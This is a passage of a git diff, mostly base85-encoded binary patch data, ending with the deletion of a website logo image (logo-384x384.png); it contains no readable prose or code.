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
C8^m=0

diff --git a/website/src/static/img/logo-384x384.png b/website/src/static/img/logo-384x384.png
deleted file mode 100644
index f5f83bad74ccfb3cf05be93831c41319c881a899..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 47594
zcmZs?1ymeC^DnxKEbcDBT^9)M65K7gySvNc9tiI4ZXrOBMFN44KycUK?hcQ9-~ZnG
